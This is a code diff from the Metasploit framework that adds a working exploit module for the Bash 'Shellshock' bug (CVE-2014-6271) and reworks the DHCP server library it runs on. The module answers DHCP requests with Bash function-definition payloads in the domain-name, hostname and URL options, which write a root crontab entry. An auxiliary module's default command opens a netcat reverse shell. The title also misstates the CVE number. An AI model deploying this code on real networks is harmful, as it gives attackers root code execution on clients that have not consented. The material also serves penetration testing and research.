Land rapid7#3893, @jlee-r7's exploit module for DHCP CVE-2014-2014-6271

Author: jvazquez-r7

lib/msf/core/exploit/dhcp.rb

@@ -12,7 +12,24 @@ module Msf
 module Exploit::DHCPServer
 
   def initialize(info = {})
-    super
+    super(update_info(info,
+      'Stance' => Msf::Exploit::Stance::Passive,
+    ))
+
+    register_options(
+      [
+        OptString.new('SRVHOST',     [ true,  "The IP of the DHCP server" ]),
+        OptString.new('NETMASK',     [ true,  "The netmask of the local subnet" ]),
+        OptString.new('DHCPIPSTART', [ false, "The first IP to give out" ]),
+        OptString.new('DHCPIPEND',   [ false, "The last IP to give out" ]),
+        OptString.new('ROUTER',      [ false, "The router IP address" ]),
+        OptString.new('BROADCAST',   [ false, "The broadcast address to send to" ]),
+        OptString.new('DNSSERVER',   [ false, "The DNS server IP address" ]),
+        OptString.new('DOMAINNAME',  [ false, "The optional domain name to assign" ]),
+        OptString.new('HOSTNAME',    [ false, "The optional hostname to assign" ]),
+        OptString.new('HOSTSTART',   [ false, "The optional host integer counter" ]),
+        OptString.new('FILENAME',    [ false, "The optional filename of a tftp boot server" ])
+      ], self.class)
 
     @dhcp = nil
   end

lib/rex/proto/dhcp/constants.rb

@@ -19,9 +19,9 @@ module DHCP
 OpLeaseTime = 0x33
 OpSubnetMask = 1
 OpRouter = 3
+OpDomainName = 15
 OpDns = 6
 OpHostname = 0x0c
-OpDomainname = 0x0f
 OpURL = 0x72
 OpEnd = 0xff
 

lib/rex/proto/dhcp/server.rb

@@ -95,7 +95,7 @@ def initialize(hash, context = {})
     self.pxepathprefix = ""
     self.pxereboottime = 2000
 
-    self.domainname = hash['DOMAINNAME'] if hash.include?('DOMAINNAME')
+    self.domain_name = hash['DOMAINNAME'] || nil
     self.url = hash['URL'] if hash.include?('URL')
   end
 
@@ -129,7 +129,7 @@ def set_option(opts)
     allowed_options = [
       :serveOnce, :pxealtconfigfile, :servePXE, :relayip, :leasetime, :dnsserv,
       :pxeconfigfile, :pxepathprefix, :pxereboottime, :router,
-      :give_hostname, :served_hostname, :served_over, :serveOnlyPXE, :domainname, :url
+      :give_hostname, :served_hostname, :served_over, :serveOnlyPXE, :domain_name, :url
     ]
 
     opts.each_pair { |k,v|
@@ -154,10 +154,11 @@ def send_packet(ip, pkt)
   end
 
   attr_accessor :listen_host, :listen_port, :context, :leasetime, :relayip, :router, :dnsserv
+  attr_accessor :domain_name
   attr_accessor :sock, :thread, :myfilename, :ipstring, :served, :serveOnce
   attr_accessor :current_ip, :start_ip, :end_ip, :broadcasta, :netmaskn
   attr_accessor :servePXE, :pxeconfigfile, :pxealtconfigfile, :pxepathprefix, :pxereboottime, :serveOnlyPXE
-  attr_accessor :give_hostname, :served_hostname, :served_over, :reporter, :domainname, :url
+  attr_accessor :give_hostname, :served_hostname, :served_over, :reporter, :url
 
 protected
 
@@ -169,7 +170,7 @@ def monitor_socket
       wds = []
       eds = [@sock]
 
-      r,w,e = ::IO.select(rds,wds,eds,1)
+      r,_,_ = ::IO.select(rds,wds,eds,1)
 
       if (r != nil and r[0] == self.sock)
         buf,host,port = self.sock.recvfrom(65535)
@@ -201,19 +202,19 @@ def dispatch_request(from, buf)
     end
 
     # parse out the members
-    hwtype = buf[1,1]
+    _hwtype = buf[1,1]
     hwlen = buf[2,1].unpack("C").first
-    hops = buf[3,1]
-    txid = buf[4..7]
-    elapsed = buf[8..9]
-    flags = buf[10..11]
+    _hops = buf[3,1]
+    _txid = buf[4..7]
+    _elapsed = buf[8..9]
+    _flags = buf[10..11]
     clientip = buf[12..15]
-    givenip = buf[16..19]
-    nextip = buf[20..23]
-    relayip = buf[24..27]
-    clienthwaddr = buf[28..(27+hwlen)]
+    _givenip = buf[16..19]
+    _nextip = buf[20..23]
+    _relayip = buf[24..27]
+    _clienthwaddr = buf[28..(27+hwlen)]
     servhostname = buf[44..107]
-    filename = buf[108..235]
+    _filename = buf[108..235]
     magic = buf[236..239]
 
     if (magic != DHCPMagic)
@@ -296,6 +297,8 @@ def dispatch_request(from, buf)
     pkt << dhcpoption(OpSubnetMask, self.netmaskn)
     pkt << dhcpoption(OpRouter, self.router)
     pkt << dhcpoption(OpDns, self.dnsserv)
+    pkt << dhcpoption(OpDomainName, self.domain_name)
+
     if self.servePXE  # PXE options
       pkt << dhcpoption(OpPXEMagic, PXEMagic)
       # We already got this one, serve localboot file
@@ -320,7 +323,6 @@ def dispatch_request(from, buf)
         pkt << dhcpoption(OpHostname, send_hostname)
       end
     end
-    pkt << dhcpoption(OpDomainname, self.domainname) if self.domainname
     pkt << dhcpoption(OpURL, self.url) if self.url
     pkt << dhcpoption(OpEnd)
 

modules/auxiliary/server/dhclient_bash_env.rb

@@ -46,34 +46,27 @@ def initialize
 
     register_options(
       [
-        OptString.new('SRVHOST',     [ true, 'The IP of the DHCP server' ]),
-        OptString.new('NETMASK',     [ true, 'The netmask of the local subnet' ]),
-        OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
-        OptString.new('DHCPIPEND',   [ false, 'The last IP to give out' ]),
-        OptString.new('ROUTER',      [ false, 'The router IP address' ]),
-        OptString.new('BROADCAST',   [ false, 'The broadcast address to send to' ]),
-        OptString.new('DNSSERVER',   [ false, 'The DNS server IP address' ]),
-        # OptString.new('HOSTNAME',    [ false, 'The optional hostname to assign' ]),
-        OptString.new('HOSTSTART',   [ false, 'The optional host integer counter' ]),
-        OptString.new('FILENAME',    [ false, 'The optional filename of a tftp boot server' ]),
-        OptString.new('CMD',         [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
+        OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
       ], self.class)
+
+    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
   end
 
   def run
     value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
 
+    hash = datastore.copy
+    hash['DOMAINNAME'] = value
+    hash['HOSTNAME'] = value
+    hash['URL'] = value
+
     # This loop is required because the current DHCP Server exits after the
     # first interaction.
     loop do
       begin
-        start_service({
-          'HOSTNAME' => value,
-          'DOMAINNAME' => value,
-          'URL' => value
-        }.merge(datastore))
+        start_service(hash)
 
-        while dhcp.thread.alive?
+        while @dhcp.thread.alive?
           select(nil, nil, nil, 2)
         end
 

modules/auxiliary/server/dhcp.rb

@@ -30,19 +30,6 @@ def initialize
       'DefaultAction'  => 'Service'
     )
 
-    register_options(
-      [
-        OptString.new('SRVHOST',     [ true,  "The IP of the DHCP server" ]),
-        OptString.new('NETMASK',     [ true,  "The netmask of the local subnet" ]),
-        OptString.new('DHCPIPSTART', [ false,  "The first IP to give out" ]),
-        OptString.new('DHCPIPEND',   [ false,  "The last IP to give out" ]),
-        OptString.new('ROUTER',      [ false,  "The router IP address" ]),
-        OptString.new('BROADCAST',   [ false,  "The broadcast address to send to" ]),
-        OptString.new('DNSSERVER',   [ false,  "The DNS server IP address" ]),
-        OptString.new('HOSTNAME',    [ false,  "The optional hostname to assign" ]),
-        OptString.new('HOSTSTART',   [ false,  "The optional host integer counter" ]),
-        OptString.new('FILENAME',    [ false,  "The optional filename of a tftp boot server" ])
-      ], self.class)
   end
 
   def run

modules/exploits/unix/dhcp/bash_environment.rb

@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/dhcp'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::DHCPServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Dhclient Bash Environment Variable Injection',
+      'Description'    => %q|
+        When bash is started with an environment variable that begins with the
+        string "() {", that variable is treated as a function definition and
+        parsed as code. If extra commands are added after the function
+        definition, they will be executed immediately. When dhclient receives
+        an ACK that contains a domain name or hostname, they are passed to
+        configuration scripts as environment variables, allowing us to trigger
+        the bash bug.
+
+        Because of the length restrictions and unusual networking scenario at
+        time of exploitation, we achieve code execution by echoing our payload
+        into /etc/crontab and clean it up when we get a shell.
+      |,
+      'Author'         => [ 'egypt' ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+          ['CVE', '2014-6271'],
+        ],
+      'Payload'        =>
+        {
+          # 255 for a domain name, minus some room for encoding
+          'Space'       => 200,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic bash telnet ruby',
+            }
+        },
+      'Targets'        => [ [ 'Automatic Target', { }] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 24 2014'
+    ))
+
+    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
+  end
+
+  def on_new_session(session)
+    print_status "Cleaning up crontab"
+    # XXX this will brick a server some day
+    session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
+  end
+
+  def exploit
+    hash = datastore.copy
+    # Quotes seem to be completely stripped, so other characters have to be
+    # escaped
+    p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }
+    echo = "echo -e #{(Rex::Text.to_hex("*") + " ") * 5}root #{p}>>/etc/crontab"
+    hash['DOMAINNAME'] = "() { :; };#{echo}"
+    if hash['DOMAINNAME'].length > 255
+      raise ArgumentError, 'payload too long'
+    end
+
+    hash['HOSTNAME'] = "() { :; };#{echo}"
+    hash['URL'] = "() { :; };#{echo}"
+    start_service(hash)
+
+    begin
+      while @dhcp.thread.alive?
+        sleep 2
+      end
+    ensure
+      stop_service
+    end
+  end
+
+end